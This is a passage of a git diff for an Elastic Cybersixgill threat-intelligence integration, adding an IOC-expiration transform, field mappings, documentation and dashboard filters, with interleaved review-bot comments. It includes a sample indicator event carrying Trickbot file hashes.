'7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d']\",\"pattern_type\":\"stix\",\"sixgill_actor\":\"vaedzy\",\"sixgill_confidence\":70,\"sixgill_feedid\":\"darkfeed_012\",\"sixgill_feedname\":\"dark_web_hashes\",\"sixgill_post_virustotallink\":\"https://virustotal.com/#/file/7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d\",\"sixgill_postid\":\"c0c9a0085fb5281cfb40a0ddb62e1d2c6a53eb7a\",\"sixgill_posttitle\":\"[病毒样本] #Trickbot (2021-12-07)\",\"sixgill_severity\":70,\"sixgill_source\":\"forum_kafan\",\"spec_version\":\"2.1\",\"type\":\"indicator\",\"valid_from\":\"2021-12-07T02:55:17Z\"}", "severity": 70, @@ -66,6 +68,7 @@ }, "first_seen": "2021-12-07T02:55:17.000Z", "last_seen": "2021-12-07T13:58:01.596Z", + "name": "7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d", "provider": "forum_kafan", "reference": "https://portal.cybersixgill.com/#/search?q=_id:c0c9a0085fb5281cfb40a0ddb62e1d2c6a53eb7a", "type": "file" @@ -82,4 +85,4 @@ ] } } -} +} \ No newline at end of file diff --git a/packages/ti_cybersixgill/docs/README.md b/packages/ti_cybersixgill/docs/README.md index 102994b191a..277b8e8e17b 100644 --- a/packages/ti_cybersixgill/docs/README.md +++ b/packages/ti_cybersixgill/docs/README.md 
@@ -8,6 +8,12 @@ This integration connects with the commercial [Cybersixgill Darkfeed](https://ww The Cybersixgill Darkfeed integration collects threat intelligence from the Darkfeed TAXII service available using the credentials provided from Cybersixgill. +#### Expiration of Indicators of Compromise (IOCs) +The ingested IOCs are expired after the duration configured by `IOC Expiration Duration` integration setting. An [Elastic Transform](https://www.elastic.co/guide/en/elasticsearch/reference/current/transforms.html) is created to faciliate only active IOCs be available to the end users. This transform creates destination indices named `logs-ti_cybersixgill_latest.dest_threat-*` which only contains active and unexpired IOCs. The latest destination index also has an alias named `logs-ti_cybersixgill_latest.threat`. When querying for active indicators or setting up indicator match rules, only use the latest destination indices or the alias to avoid false positives from expired IOCs. Dashboards are also pointing to the latest destination indices containing active IOC. Please read [ILM Policy](#ilm-policy) below which is added to avoid unbounded growth on source datastream `.ds-logs-ti_cybersixgill.threat-*` indices. + +#### ILM Policy +To facilitate IOC expiration, source datastream-backed indices `.ds-logs-ti_cybersixgill.threat-*` are allowed to contain duplicates from each polling interval. ILM policy `logs-ti_cybersixgill.threat-default_policy` is added to these source indices so it doesn't lead to unbounded growth. This means data in these source indices will be deleted after `5 days` from ingested date. + **Exported fields** | Field | Description | Type | 
@@ -27,6 +33,8 @@ The Cybersixgill Darkfeed integration collects threat intelligence from the Dark | container.labels | Image labels. | object | | container.name | Container name. | keyword | | cybersixgill.actor | The related actor for the indicator. | keyword | +| cybersixgill.deleted_at | The timestamp when indicator is (or will be) expired. | date | +| cybersixgill.expiration_duration | The configured expiration duration. | keyword | | cybersixgill.feedname | Name of the Threat Intel feed. | keyword | | cybersixgill.mitre.description | The mitre description of the indicator | keyword | | cybersixgill.title | The title of the indicator. | keyword | @@ -67,6 +75,8 @@ The Cybersixgill Darkfeed integration collects threat intelligence from the Dark | host.os.version | Operating system version as a raw string. | keyword | | host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword | | input.type | Input type. | keyword | +| labels | Custom key/value pairs. Can be used to add meta information to events. Should not contain nested objects. All values are stored as keyword. Example: `docker` and `k8s` labels. | object | +| labels.is_ioc_transform_source | Field indicating if its the transform source for supporting IOC expiration. This field is dropped from destination indices to facilitate easier filtering of indicators. | constant_keyword | | message | For log events the message field contains the log message, optimized for viewing in a log viewer. For structured logs without an original message field, other fields can be concatenated to form a human-readable summary of the event. If multiple messages exist, they can be combined into one message. | match_only_text | | tags | List of keywords used to tag each event. | keyword | | threat.feed.dashboard_id | Dashboard ID used for Kibana CTI UI | constant_keyword | 
@@ -79,6 +89,7 @@ The Cybersixgill Darkfeed integration collects threat intelligence from the Dark | threat.indicator.first_seen | The date and time when intelligence source first reported sighting this indicator. | date | | threat.indicator.ip | Identifies a threat indicator as an IP address (irrespective of direction). | ip | | threat.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.indicator.name | The display name indicator in an UI friendly format | keyword | | threat.indicator.provider | The name of the indicator's provider. | keyword | | threat.indicator.reference | Reference URL linking to additional information about this indicator. | keyword | | threat.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | @@ -102,14 +113,16 @@ An example event for `threat` looks as following: { "@timestamp": "2021-12-07T13:58:01.596Z", "agent": { - "ephemeral_id": "a7e7cf45-534a-4104-b3c3-9b30d6ebeeb9", - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "ephemeral_id": "5b99e697-c059-40e4-9097-eb5a21a371c6", + "id": "49b0da18-7d53-4b44-9bda-940341f4fb0f", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.9.1" + "version": "8.12.1" }, "cybersixgill": { "actor": "vaedzy", + "deleted_at": "2021-12-17T13:58:01.596Z", + "expiration_duration": "10d", "feedname": "dark_web_hashes", "mitre": { "description": "Mitre attack tactics and technique reference" 
@@ -129,18 +142,18 @@ An example event for `threat` looks as following: "version": "8.11.0" }, "elastic_agent": { - "id": "5607d6f4-6e45-4c33-a087-2e07de5f0082", + "id": "49b0da18-7d53-4b44-9bda-940341f4fb0f", "snapshot": false, - "version": "8.9.1" + "version": "8.12.1" }, "event": { "agent_id_status": "verified", "category": [ "threat" ], - "created": "2023-08-28T14:48:23.885Z", + "created": "2024-03-15T19:20:27.045Z", "dataset": "ti_cybersixgill.threat", - "ingested": "2023-08-28T14:48:24Z", + "ingested": "2024-03-15T19:20:27Z", "kind": "enrichment", "original": "{\"confidence\":70,\"created\":\"2021-12-07T13:58:01.596Z\",\"description\":\"Hash attributed to malware that was discovered in the dark and deep web\",\"extensions\":{\"extension-definition--3de9ff00-174d-4d41-87c9-05a27a7e117c\":{\"extension_type\":\"toplevel-property-extension\"}},\"external_references\":[{\"positive_rate\":\"medium\",\"source_name\":\"VirusTotal\",\"url\":\"https://virustotal.com/#/file/7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d\"},{\"description\":\"Mitre attack tactics and technique reference\",\"mitre_attack_tactic\":\"Build Capabilities\",\"mitre_attack_tactic_id\":\"TA0024\",\"mitre_attack_tactic_url\":\"https://attack.mitre.org/tactics/TA0024/\",\"source_name\":\"mitre-attack\"}],\"id\":\"indicator--302dab0f-64dc-42f5-b99e-702b28c1aaa9\",\"indicator_types\":[\"malicious-activity\"],\"lang\":\"en\",\"modified\":\"2021-12-07T13:58:01.596Z\",\"name\":\"4d0f21919d623bd1631ee15ca7429f28;5ce39ef0700b64bd0c71b55caf64ae45d8400965;7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d\",\"pattern\":\"[file:hashes.MD5 = '4d0f21919d623bd1631ee15ca7429f28' OR file:hashes.'SHA-1' = '5ce39ef0700b64bd0c71b55caf64ae45d8400965' OR file:hashes.'SHA-256' = 
'7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d']\",\"pattern_type\":\"stix\",\"sixgill_actor\":\"vaedzy\",\"sixgill_confidence\":70,\"sixgill_feedid\":\"darkfeed_012\",\"sixgill_feedname\":\"dark_web_hashes\",\"sixgill_post_virustotallink\":\"https://virustotal.com/#/file/7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d\",\"sixgill_postid\":\"c0c9a0085fb5281cfb40a0ddb62e1d2c6a53eb7a\",\"sixgill_posttitle\":\"[病毒样本] #Trickbot (2021-12-07)\",\"sixgill_severity\":70,\"sixgill_source\":\"forum_kafan\",\"spec_version\":\"2.1\",\"type\":\"indicator\",\"valid_from\":\"2021-12-07T02:55:17Z\"}", "severity": 70, @@ -167,6 +180,7 @@ An example event for `threat` looks as following: }, "first_seen": "2021-12-07T02:55:17.000Z", "last_seen": "2021-12-07T13:58:01.596Z", + "name": "7bdf8b8594ec269da864ee662334f4da53d4820a3f0f8aa665a0fa096ca8f22d", "provider": "forum_kafan", "reference": "https://portal.cybersixgill.com/#/search?q=_id:c0c9a0085fb5281cfb40a0ddb62e1d2c6a53eb7a", "type": "file" @@ -184,5 +198,4 @@ An example event for `threat` looks as following: } } } - ``` \ No newline at end of file diff --git a/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/agent.yml b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/agent.yml new file mode 100644 index 00000000000..845b84ed9c0 --- /dev/null +++ b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/agent.yml 
@@ -0,0 +1,201 @@ +- name: cloud + title: Cloud + group: 2 + description: Fields related to the cloud or infrastructure the events are coming from. + footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.' + type: group + fields: + - name: account.id + level: extended + type: keyword + ignore_above: 1024 + description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment. + + Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.' + example: 666777888999 + - name: availability_zone + level: extended + type: keyword + ignore_above: 1024 + description: Availability zone in which this host is running. + example: us-east-1c + - name: instance.id + level: extended + type: keyword + ignore_above: 1024 + description: Instance ID of the host machine. + example: i-1234567890abcdef0 + - name: instance.name + level: extended + type: keyword + ignore_above: 1024 + description: Instance name of the host machine. + - name: machine.type + level: extended + type: keyword + ignore_above: 1024 + description: Machine type of the host machine. + example: t2.medium + - name: provider + level: extended + type: keyword + ignore_above: 1024 + description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean. + example: aws + - name: region + level: extended + type: keyword + ignore_above: 1024 + description: Region in which this host is running. + example: us-east-1 + - name: project.id + type: keyword + description: Name of the project in Google Cloud. + - name: image.id + type: keyword + description: Image ID for the cloud instance. 
+- name: container + title: Container + group: 2 + description: 'Container fields are used for meta information about the specific container that is the source of information. + + These fields help correlate data based containers from any runtime.' + type: group + fields: + - name: id + level: core + type: keyword + ignore_above: 1024 + description: Unique container id. + - name: image.name + level: extended + type: keyword + ignore_above: 1024 + description: Name of the image the container was built on. + - name: labels + level: extended + type: object + object_type: keyword + description: Image labels. + - name: name + level: extended + type: keyword + ignore_above: 1024 + description: Container name. +- name: host + title: Host + group: 2 + description: 'A host is defined as a general computing instance. + + ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.' + type: group + fields: + - name: architecture + level: core + type: keyword + ignore_above: 1024 + description: Operating system architecture. + example: x86_64 + - name: domain + level: extended + type: keyword + ignore_above: 1024 + description: 'Name of the domain of which the host is a member. + + For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.' + example: CONTOSO + default_field: false + - name: hostname + level: core + type: keyword + ignore_above: 1024 + description: 'Hostname of the host. + + It normally contains what the `hostname` command returns on the host machine.' + - name: id + level: core + type: keyword + ignore_above: 1024 + description: 'Unique host id. + + As hostname is not always unique, use values that are meaningful in your environment. + + Example: The current usage of `beat.name`.' 
+ - name: ip + level: core + type: ip + description: Host ip addresses. + - name: mac + level: core + type: keyword + ignore_above: 1024 + description: Host mac addresses. + - name: name + level: core + type: keyword + ignore_above: 1024 + description: 'Name of the host. + + It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.' + - name: os.family + level: extended + type: keyword + ignore_above: 1024 + description: OS family (such as redhat, debian, freebsd, windows). + example: debian + - name: os.kernel + level: extended + type: keyword + ignore_above: 1024 + description: Operating system kernel version as a raw string. + example: 4.4.0-112-generic + - name: os.name + level: extended + type: keyword + ignore_above: 1024 + multi_fields: + - name: text + type: text + norms: false + default_field: false + description: Operating system name, without the version. + example: Mac OS X + - name: os.platform + level: extended + type: keyword + ignore_above: 1024 + description: Operating system platform (such centos, ubuntu, windows). + example: darwin + - name: os.version + level: extended + type: keyword + ignore_above: 1024 + description: Operating system version as a raw string. + example: 10.14.1 + - name: type + level: core + type: keyword + ignore_above: 1024 + description: 'Type of host. + + For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.' + - name: containerized + type: boolean + description: > + If the host is a container. + + - name: os.build + type: keyword + example: "18D109" + description: > + OS build information. + + - name: os.codename + type: keyword + example: "stretch" + description: > + OS codename, if any. + +- name: input.type + type: keyword + description: Input type. 
diff --git a/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/base-fields.yml b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/base-fields.yml
new file mode 100644
index 00000000000..9b559d71a60
--- /dev/null
+++ b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/base-fields.yml
@@ -0,0 +1,37 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset name.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: dataset.type
+ type: constant_keyword
+ description: Dataset type.
+- name: dataset.name
+ type: constant_keyword
+ description: Dataset name.
+- name: dataset.namespace
+ type: constant_keyword
+ description: Dataset namespace.
+- name: event.module
+ type: constant_keyword
+ description: Event module
+ value: ti_cybersixgill
+- name: event.dataset
+ type: constant_keyword
+ description: Event dataset
+ value: ti_cybersixgill.threat
+- name: threat.feed.name
+ type: constant_keyword
+ description: Display friendly feed name
+ value: Cybersixgill Darkfeed
+- name: threat.feed.dashboard_id
+ type: constant_keyword
+ description: Dashboard ID used for Kibana CTI UI
+ value: ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738
+- name: "@timestamp"
+ type: date
+ description: Event timestamp.
diff --git a/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/ecs.yml b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/ecs.yml
new file mode 100644
index 00000000000..e3fd02e3895
--- /dev/null
+++ b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/ecs.yml
@@ -0,0 +1,67 @@
+- external: ecs
+ name: ecs.version
+- external: ecs
+ name: message
+- external: ecs
+ name: error.message
+- external: ecs
+ name: event.category
+- external: ecs
+ name: event.ingested
+- external: ecs
+ name: event.kind
+- external: ecs
+ name: event.original
+- external: ecs
+ name: event.severity
+- external: ecs
+ name: event.created
+- external: ecs
+ name: tags
+- external: ecs
+ name: threat.indicator.file.hash.md5
+- external: ecs
+ name: threat.indicator.file.hash.sha1
+- external: ecs
+ name: threat.indicator.file.hash.sha256
+- external: ecs
+ name: threat.indicator.url.full
+- external: ecs
+ name: threat.indicator.url.domain
+- external: ecs
+ name: threat.indicator.url.extension
+- external: ecs
+ name: threat.indicator.url.original
+- external: ecs
+ name: threat.indicator.url.path
+- external: ecs
+ name: threat.indicator.url.scheme
+- external: ecs
+ name: threat.indicator.url.fragment
+- external: ecs
+ name: threat.indicator.ip
+- external: ecs
+ name: threat.indicator.type
+- external: ecs
+ name: threat.indicator.description
+- external: ecs
+ name: threat.indicator.provider
+- external: ecs
+ name: threat.indicator.reference
+- external: ecs
+ name: threat.indicator.confidence
+- external: ecs
+ name: threat.indicator.first_seen
+- external: ecs
+ name: threat.indicator.last_seen
+- external: ecs
+ name: threat.tactic.name
+- external: ecs
+ name: threat.tactic.id
+- external: ecs
+ name: threat.tactic.reference
+# Manually define this as a workaround for failing tests and validation
+- name: threat.indicator.name
+ level: extended
+ type: keyword
+ description: The display name indicator in an UI friendly format
diff --git a/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/fields.yml b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/fields.yml
new file mode 100644
index 00000000000..24d37ab118d
--- /dev/null
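Review bot: `event.id` is missing from this field list even though the transform in this same package uses it as one of its `latest.unique_key` fields, so in the destination index it only receives a mapping through the `strings_as_keyword` dynamic template rather than an explicit, validated one. Adding `- external: ecs` / `  name: event.id` next to the other `event.*` entries keeps the key field's mapping explicit and lets package validation check it. The description on the manually defined `threat.indicator.name` also reads awkwardly; `The display name of the indicator, in a UI-friendly format` would be clearer.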
+++ b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/fields/fields.yml
@@ -0,0 +1,39 @@
+- name: cybersixgill
+ type: group
+ fields:
+ - name: feedname
+ type: keyword
+ description: |
+ Name of the Threat Intel feed.
+ - name: title
+ type: keyword
+ description: |
+ The title of the indicator.
+ - name: actor
+ type: keyword
+ description: |
+ The related actor for the indicator.
+ - name: valid_from
+ type: date
+ description: |
+ At what date the indicator is valid from.
+ - name: virustotal.pr
+ type: keyword
+ description: |
+ The Virustotal positive rate.
+ - name: virustotal.url
+ type: keyword
+ description: |
+ The related Virustotal URL.
+ - name: mitre.description
+ type: keyword
+ description: |
+ The mitre description of the indicator
+ - name: deleted_at
+ type: date
+ description: |
+ The timestamp when indicator is (or will be) expired.
+ - name: expiration_duration
+ type: keyword
+ description: |
+ The configured expiration duration.
diff --git a/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/manifest.yml b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/manifest.yml
new file mode 100644
index 00000000000..f5296fd0c0a
--- /dev/null
+++ b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/manifest.yml
@@ -0,0 +1,18 @@
+start: true
+destination_index_template:
+ settings:
+ index:
+ sort:
+ field:
+ - "@timestamp"
+ order:
+ - desc
+ mappings:
+ dynamic: true
+ dynamic_templates:
+ - strings_as_keyword:
+ match_mapping_type: string
+ mapping:
+ ignore_above: 1024
+ type: keyword
+ date_detection: false
diff --git a/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/transform.yml b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/transform.yml
new file mode 100644
index 00000000000..e288e30e501
--- /dev/null
+++ b/packages/ti_cybersixgill/elasticsearch/transform/latest_ioc/transform.yml
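Review bot: `mappings.dynamic: true` on the destination index template means any field present in a source document's `_source` gets mapped in the latest index, and because this data originates from an external TAXII feed that is a mapping-growth exposure if the source pipeline does not drop fields the data stream does not declare — I cannot see the pipeline from this diff, so treat that as something to confirm. A one-line comment would make the trade-off explicit, e.g. `# dynamic: true — unmapped fields copied from the source _source are mapped here; the source data stream's mappings bound what can arrive`. If growth becomes a problem, a lower `index.mapping.total_fields.limit` under `settings.index` is the usual mitigation without switching to `dynamic: false`.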
@@ -0,0 +1,37 @@
+# Use of "*" to use all namespaces defined.
+source:
+ index:
+ - "logs-ti_cybersixgill.threat-*"
+# The version suffix on the dest.index should be incremented if a breaking change
+# is made to the index mapping. You must also bump the fleet_transform_version
+# for any change to this transform configuration to take effect. The old destination
+# index is not automatically deleted. We are dependent on https://github.com/elastic/package-spec/issues/523 to give
+# us that ability in order to prevent having duplicate IoC data and prevent query
+# time field type conflicts.
+dest:
+ index: "logs-ti_cybersixgill_latest.dest_threat-1"
+ aliases:
+ - alias: "logs-ti_cybersixgill_latest.threat"
+ move_on_creation: true
+latest:
+ unique_key:
+ - event.dataset
+ - event.id
+ sort: '@timestamp'
+description: Latest Indicator data retrieved from cybersixgill Darkfeed TAXII server.
+frequency: 30s
+sync:
+ time:
+ field: event.ingested
+ # Updated to 120s because of refresh delay in Serverless. With default 60s, sometimes transform wouldn't process all documents.
+ delay: 120s
+retention_policy:
+ time:
+ field: cybersixgill.deleted_at
+ # Delete immediately after reaching the `deleted_at` timestamp.
+ max_age: 1m
+_meta:
+ managed: true
+ # Bump this version to delete, reinstall, and restart the transform during package.
+ # Version bump is needed if there is any code change in transform.
+ fleet_transform_version: 0.1.0
diff --git a/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738.json b/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738.json
index d92a13f17f6..9fd25519bf1 100644
--- a/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738.json
+++ b/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738.json
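Review bot: The retention policy only ever deletes documents that carry `cybersixgill.deleted_at`; an indicator that lands in `logs-ti_cybersixgill_latest.dest_threat-1` without that field (for instance data ingested before the pipeline started populating it) will never age out, and a stale IoC in the latest index keeps feeding indicator-match rules with false positives long after the provider has withdrawn it. That invariant deserves a line next to the policy, e.g. `# Documents without cybersixgill.deleted_at are never removed by this policy; the ingest pipeline must always set it.` The `sync.time.field: event.ingested` choice also means a document whose `@timestamp` changes without a fresh `event.ingested` is not re-read by the transform — presumably acceptable for append-only feed data, but worth a comment. The `_meta` comment ending in `during package.` looks truncated; `during package upgrade.` is probably what was intended.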
@@ -66,6 +66,25 @@ "data_stream.dataset": "ti_cybersixgill.threat" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "type": "exists" + }, + "query": { + "exists": { + "field": "labels.is_ioc_transform_source" + } + } } ], "query": { 
@@ -100,7 +119,7 @@ "description": "", "params": { "fontSize": 12, - "markdown": "**Navigation**\n\n[Cybersixgill Overview](/app/dashboards#/view/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738) \n**[Cybersixgill Files (This Page)](/app/dashboards#/view/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738)** \n[Cybersixgill URLs](/app/dashboards#/view/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738) \n\n[Integrations Page](/app/integrations/detail/ti_cybersixgill/overview)\n\n\n**Overview**\n\nThis dashboard is an overview of the different threat intelligence indicators with a **threat.indicator.type: file**.\n\nThe dashboard is made to provide general statistics and show the health of your indicators like hash type counters, popular domains, statistics about how many unique indicators are ingested and other relevant information.", + "markdown": "**Navigation**\n\n[Cybersixgill Overview](/app/dashboards#/view/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738) \n**[Cybersixgill Files (This Page)](/app/dashboards#/view/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738)** \n[Cybersixgill URLs](/app/dashboards#/view/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738) \n\n[Integrations Page](/app/integrations/detail/ti_cybersixgill/overview)\n\n\n**Overview**\n\nThis dashboard is an overview of the different threat intelligence indicators with a **threat.indicator.type: file**.\n\nThe dashboard is made to provide general statistics and show the health of your indicators like hash type counters, popular domains, statistics about how many unique indicators are ingested and other relevant information. The dashboard is made to provide general statistics and show the health of the ingestion of indicators from Cybersixgill. The dashboard only shows the active indicators that are not expired. 
The indicators are expired after the duration set by `IOC Expiration Duration` in the integration settings since the time they are created(`@timestamp`).", "openLinksInNewTab": false }, "title": "Files Navigation Textbox [Logs AbuseCH]", @@ -116,8 +135,7 @@ "y": 0 }, "panelIndex": "09ba3dc0-e2e2-4799-b47f-bb919bf290a1", - "type": "visualization", - "version": "8.7.1" + "type": "visualization" }, { "embeddableConfig": { @@ -188,8 +206,7 @@ }, "panelIndex": "31ea16d1-7591-42a7-b773-6fca00e5db14", "title": "Unique File Types [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -263,8 +280,7 @@ }, "panelIndex": "4d3e11dc-c4cc-4373-bb83-3d39fe6ffa98", "title": "Unique MD5 [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -365,8 +381,7 @@ }, "panelIndex": "c66ad183-f4f0-4605-b35d-85b7038403fd", "title": "Mitre Tactics ID [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -467,8 +482,7 @@ }, "panelIndex": "fcc44298-dfb6-4bd4-a63d-e845ce3eb859", "title": "Mitre Tactics Name [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -542,8 +556,7 @@ }, "panelIndex": "e9b6f0ad-5e6b-44da-923e-dc0d5ccfdfea", "title": "Unique SHA1 [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -617,8 +630,7 @@ }, "panelIndex": "93e32abe-87e3-469e-b7e9-a7ef7dfa2cce", "title": "Unique SHA256 [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -717,8 +729,7 @@ }, "panelIndex": "0638c316-a573-412f-b3c4-f72dde07c6e8", "title": "Top Feeds [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { 
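Review bot: The new markdown repeats itself: `...statistics about how many unique indicators are ingested and other relevant information.` is immediately followed by `The dashboard is made to provide general statistics and show the health of the ingestion of indicators from Cybersixgill.`, which restates the previous sentence using the Overview dashboard's wording. Keeping only the expiry note (`The dashboard only shows the active indicators that are not expired. ...`) after the existing sentence reads cleaner, and `created(\`@timestamp\`)` needs a space before the parenthesis. The same duplicated sentence appears in the URLs dashboard's textbox further down this diff.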
@@ -855,8 +866,7 @@ }, "panelIndex": "6866585e-4589-4a7e-9763-3b2493f488e7", "title": "File Tags [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" }, { "embeddableConfig": { @@ -957,20 +967,17 @@ }, "panelIndex": "256a7b33-485f-4715-90f3-768bea61d23e", "title": "Confidence Levels [Logs Cybersixgill]", - "type": "lens", - "version": "8.7.1" + "type": "lens" } ], "timeRestore": false, "title": "[Logs Cybersixgill] Files", "version": 1 }, - "coreMigrationVersion": "8.7.1", - "created_at": "2023-07-12T04:51:38.930Z", + "coreMigrationVersion": "8.8.0", + "created_at": "2024-03-15T20:00:54.955Z", "id": "ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738", - "migrationVersion": { - "dashboard": "8.7.0" - }, + "managed": false, "references": [ { "id": "logs-*", @@ -987,6 +994,11 @@ "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[2].meta.index", "type": "index-pattern" }, + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "type": "index-pattern" + }, { "id": "logs-*", "name": "31ea16d1-7591-42a7-b773-6fca00e5db14:indexpattern-datasource-current-indexpattern", @@ -1076,7 +1088,13 @@ "id": "ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", "name": "tag-ref-ti_cybersixgill-7186bf10-5be4-11ec-9302-152fd766c738", "type": "tag" + }, + { + "id": "ti_cybersixgill-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" } ], - "type": "dashboard" + "type": "dashboard", + "typeMigrationVersion": "8.9.0" } \ No newline at end of file diff --git a/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738.json b/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738.json index 5ce1c3db7ca..f35fba3ea69 100644 --- a/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738.json 
+++ b/packages/ti_cybersixgill/kibana/dashboard/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738.json @@ -66,6 +66,25 @@ "threat.indicator.type": "url" } } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "labels.is_ioc_transform_source", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[3].meta.index", + "key": "labels.is_ioc_transform_source", + "negate": true, + "type": "exists" + }, + "query": { + "exists": { + "field": "labels.is_ioc_transform_source" + } + } } ], "query": { 
@@ -101,7 +120,7 @@ "id": "", "params": { "fontSize": 12, - "markdown": "**Navigation**\n\n[Cybersixgill Overview](/app/dashboards#/view/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738) \n[Cybersixgill Files](/app/dashboards#/view/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738) \n**[Cybersixgill URLs (This Page)](/app/dashboards#/view/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738)** \n\n[Integrations Page](/app/integrations/detail/ti_cybersixgill/overview)\n\n\n**Overview**\n\nThis dashboard is an overview of the different threat intelligence indicators with a **threat.indicator.type: url**. \n\nThe dashboard is made to provide general statistics and show the health of your indicators like popular domains, file extensions, statistics about how many unique indicators are ingested and other relevant information.", + "markdown": "**Navigation**\n\n[Cybersixgill Overview](/app/dashboards#/view/ti_cybersixgill-c75353f0-5be8-11ec-9302-152fd766c738) \n[Cybersixgill Files](/app/dashboards#/view/ti_cybersixgill-63c9fee0-5bea-11ec-9302-152fd766c738) \n**[Cybersixgill URLs (This Page)](/app/dashboards#/view/ti_cybersixgill-717013b0-5bed-11ec-9302-152fd766c738)** \n\n[Integrations Page](/app/integrations/detail/ti_cybersixgill/overview)\n\n\n**Overview**\n\nThis dashboard is an overview of the different threat intelligence indicators with a **threat.indicator.type: url**. \n\nThe dashboard is made to provide general statistics and show the health of your indicators like popular domains, file extensions, statistics about how many unique indicators are ingested and other relevant information. The dashboard is made to provide general statistics and show the health of the ingestion of indicators from Cybersixgill. The dashboard only shows the active indicators that are not expired. 
